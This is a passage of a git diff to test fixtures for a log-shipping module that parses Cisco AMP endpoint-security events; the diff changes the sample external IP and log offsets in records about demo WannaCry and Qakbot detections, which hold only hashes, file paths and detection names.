         "process.hash.sha256": "b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4",
         "related.hash": [
             "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"
@@ -1492,7 +1492,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1504,7 +1504,7 @@
         "@timestamp": "2021-01-14T13:46:00.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1536,7 +1536,7 @@
         "host.hostname": "Demo_Low_Prev_Retro",
         "host.name": "Demo_Low_Prev_Retro",
         "input.type": "log",
-        "log.offset": 32509,
+        "log.offset": 32634,
         "related.hash": [
             "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"
         ],
@@ -1545,7 +1545,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1557,7 +1557,7 @@
         "@timestamp": "2021-01-14T13:46:00.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1597,7 +1597,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 33628,
+        "log.offset": 33758,
         "related.hash": [
             "48a0bf05b9706a00d2a0ff6260412f11",
             "5058b16a86beee96927371210b9a9f682976a50a",
@@ -1608,7 +1608,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1620,7 +1620,7 @@
         "@timestamp": "2021-01-14T13:45:59.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1658,7 +1658,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 34974,
+        "log.offset": 35109,
         "related.hash": [
             "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"
         ],
@@ -1667,7 +1667,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1679,7 +1679,7 @@
         "@timestamp": "2021-01-14T13:43:32.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1713,7 +1713,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 36260,
+        "log.offset": 36400,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -1722,7 +1722,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1734,7 +1734,7 @@
         "@timestamp": "2021-01-14T13:43:32.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1774,7 +1774,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 37453,
+        "log.offset": 37598,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
             "db349b97c37d22f5ea1d1841e3c89eb4",
@@ -1785,7 +1785,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1801,7 +1801,7 @@
         "@timestamp": "2021-01-14T13:43:32.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1840,7 +1840,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 38805,
+        "log.offset": 38955,
         "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4",
         "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
         "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
@@ -1854,7 +1854,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1870,7 +1870,7 @@
         "@timestamp": "2021-01-14T13:43:32.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1908,7 +1908,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 40328,
+        "log.offset": 40483,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
             "db349b97c37d22f5ea1d1841e3c89eb4",
@@ -1919,7 +1919,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1935,7 +1935,7 @@
         "@timestamp": "2021-01-14T13:43:32.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1976,7 +1976,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 41673,
+        "log.offset": 41833,
         "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f",
         "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
         "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
@@ -1992,7 +1992,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2008,7 +2008,7 @@
         "@timestamp": "2021-01-14T13:43:32.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2048,7 +2048,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 43279,
+        "log.offset": 43444,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
             "db349b97c37d22f5ea1d1841e3c89eb4",
@@ -2059,7 +2059,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2075,7 +2075,7 @@
         "@timestamp": "2021-01-14T13:43:32.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2113,7 +2113,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 44631,
+        "log.offset": 44801,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
             "db349b97c37d22f5ea1d1841e3c89eb4",
@@ -2124,7 +2124,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2140,7 +2140,7 @@
         "@timestamp": "2021-01-14T13:43:32.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2172,7 +2172,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 45976,
+        "log.offset": 46151,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -2181,7 +2181,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2193,7 +2193,7 @@
         "@timestamp": "2021-01-14T13:43:30.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2225,7 +2225,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 47096,
+        "log.offset": 47276,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2234,7 +2234,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2246,7 +2246,7 @@
         "@timestamp": "2021-01-14T13:43:29.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2287,7 +2287,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 48216,
+        "log.offset": 48401,
         "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4",
         "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
         "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
@@ -2303,7 +2303,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2319,7 +2319,7 @@
         "@timestamp": "2021-01-14T13:29:36.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2352,7 +2352,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 49823,
+        "log.offset": 50013,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2361,7 +2361,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2373,7 +2373,7 @@
         "@timestamp": "2021-01-14T13:28:09.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2399,13 +2399,13 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 51019,
+        "log.offset": 51214,
         "related.hosts": [
             "Demo_Qakbot_3"
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2417,7 +2417,7 @@
         "@timestamp": "2021-01-14T13:06:19.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2451,7 +2451,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 51942,
+        "log.offset": 52142,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2460,7 +2460,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2472,7 +2472,7 @@
         "@timestamp": "2021-01-14T13:06:19.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2510,7 +2510,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 53134,
+        "log.offset": 53339,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2519,7 +2519,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2535,7 +2535,7 @@
         "@timestamp": "2021-01-14T13:06:19.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2573,7 +2573,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 54407,
+        "log.offset": 54617,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2582,7 +2582,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2598,7 +2598,7 @@
         "@timestamp": "2021-01-14T13:06:18.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2632,7 +2632,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 55679,
+        "log.offset": 55894,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2641,7 +2641,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2653,7 +2653,7 @@
         "@timestamp": "2021-01-14T13:06:18.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2687,7 +2687,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 56872,
+        "log.offset": 57092,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2696,7 +2696,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2708,7 +2708,7 @@
         "@timestamp": "2021-01-14T13:06:18.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2742,7 +2742,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 58065,
+        "log.offset": 58290,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2751,7 +2751,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2763,7 +2763,7 @@
         "@timestamp": "2021-01-14T13:06:18.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2797,7 +2797,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 59258,
+        "log.offset": 59488,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2806,7 +2806,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2818,7 +2818,7 @@
         "@timestamp": "2021-01-14T13:06:18.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2852,7 +2852,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 60451,
+        "log.offset": 60686,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2861,7 +2861,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2873,7 +2873,7 @@
         "@timestamp": "2021-01-14T13:06:18.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2914,7 +2914,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 61637,
+        "log.offset": 61877,
         "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
         "process.name": "tasksche.exe",
         "process.pid": 4688,
@@ -2928,7 +2928,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2944,7 +2944,7 @@
         "@timestamp": "2021-01-14T13:06:18.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2982,7 +2982,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 63166,
+        "log.offset": 63411,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2991,7 +2991,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -3007,7 +3007,7 @@
         "@timestamp": "2021-01-14T13:06:18.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3039,7 +3039,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 64439,
+        "log.offset": 64689,
         "related.hash": [
             "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
         ],
@@ -3048,7 +3048,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3060,7 +3060,7 @@
         "@timestamp": "2021-01-14T13:06:17.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3094,7 +3094,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 65559,
+        "log.offset": 65814,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -3103,7 +3103,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log
index 9842f3cbe934..d4c5689972c5 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log
@@ -1,49 +1,49 @@
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
